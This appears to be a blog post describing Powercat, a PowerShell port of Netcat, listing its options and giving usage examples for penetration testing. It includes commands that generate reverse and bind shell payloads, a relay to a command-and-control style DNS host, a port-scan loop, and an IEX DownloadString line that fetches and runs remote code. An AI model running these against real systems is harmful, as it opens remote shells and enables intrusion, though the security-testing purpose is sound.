Powercat: a porting of Netcat written in Powershell

With some useful enhanced features!

Netcat is a “venerable”network tool, dubbed “the TCP/IP swiss army knife”.
It’s an open source UNIX utility written in C (but also available on a great number of OSs) for performing network related tasks, really useful during network discovery/troubleshooting, but also during penetration tests.

On this GitHub repository i’ve found an interesting porting of Netcat developed using Powershell.

The command parameters are pretty similar of ‘official’ Netcat:

-l Listen for a connection. [Switch]
-c Connect to a listener. [String]
-p The port to connect to, or listen on. [String]
-e Execute. (GAPING_SECURITY_HOLE) [String]
-ep Execute Powershell. [Switch]
-r Relay. Format: "-r tcp:" [String]
-u Transfer data over UDP. [Switch]
-dns Transfer data over dns (dnscat2). [String]
-dnsft DNS Failure Threshold. [int32]
-t Timeout option. Default: 60 [int32]
-i Input: Filepath (string), byte array, or string. [object]
-o Console Output Type: "Host", "Bytes", or "String" [String]
-of Output File Path. [String]
-d Disconnect after connecting. [Switch]
-rep Repeater. Restart after disconnecting. [Switch]
-g Generate Payload. [Switch]
-ge Generate Encoded Payload. [Switch]
-h Print the help message. [Switch]

However the developer has added some additional features focused on penetration testing.

For example, Powercat is able to create simple payloads:

Payloads which do a specific action can be generated using -g (Generate Payload) and -ge (Generate Encoded Payload). Encoded payloads can be executed with powershell -E. You can use these if you don’t want to use all of powercat.

Generate a reverse tcp payload which connects back to port 443:
powercat -c -p 443 -e cmd -g
Generate a bind tcp encoded command which listens on port 8000:
powercat -l -p 8000 -e cmd -ge

and allows to create network relays without start a second process:

Relays in powercat work just like traditional netcat relays, but you don’t have to create a file or start a second process. You can also relay data between connections of different protocols.

TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:
TCP Listener to UDP Client Relay:
powercat -l -p 8000 -r udp:
TCP Listener to DNS Client Relay
powercat -l -p 8000 -r dns:
TCP Listener to DNS Client Relay using the Windows Default DNS Server
powercat -l -p 8000 -r dns:::c2.example.com
TCP Client to Client Relay
powercat -c -p 9000 -r tcp:
TCP Listener to Listener Relay
powercat -l -p 8000 -r tcp:9000

Finally, the portscanner feature has been implemented with a “powershell flavour”:

(21,22,80,443) | % {powercat -c -p $_ -t 1 -Verbose -d}


Pretty simple, like others powershell functions:

powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts.

Load The Function From Downloaded .ps1 File:
. .\powercat.ps1
Load The Function From URL:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/

References and downloads


This site uses Akismet to reduce spam. Learn how your comment data is processed.